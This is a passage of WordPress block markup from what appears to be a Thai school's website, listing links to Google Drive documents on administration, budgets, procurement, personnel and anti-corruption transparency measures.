/wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=drive_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br><a href=\"https://drive.google.com/file/d/1cgINnIyago0IrJkXeI7V2y4G4p5Zq3yR/view?usp=sharing\">     - คู่มือฝ่ายบริหารงานงบประมาณ</a><br><a href=\"https://drive.google.com/file/d/1DstLLhCLdPqU3gL1bu5p0UByVlg4Yt9t/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานวิชาการ</a><br><a href=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=drive_link\" data-type=\"page\" data-id=\"2\"> - คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1QhT6YZ7u_mYXsy_mZUDQXHL1Yx0XHO7B/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ป</a><a href=\"http://watprato.ssk.in.th/?page_id=2\" data-type=\"page\" data-id=\"2\">ระกาศเจตนารมณ์นโยบาย No G</a><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1l-VlfXu6thxBFvL0JpgAcCUrTrqNNp4G/view?usp=drive_link\">แ</a><a href=\"https://drive.google.com/file/d/1l-VlfXu6thxBFvL0JpgAcCUrTrqNNp4G/view?usp=sharing\">ผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery 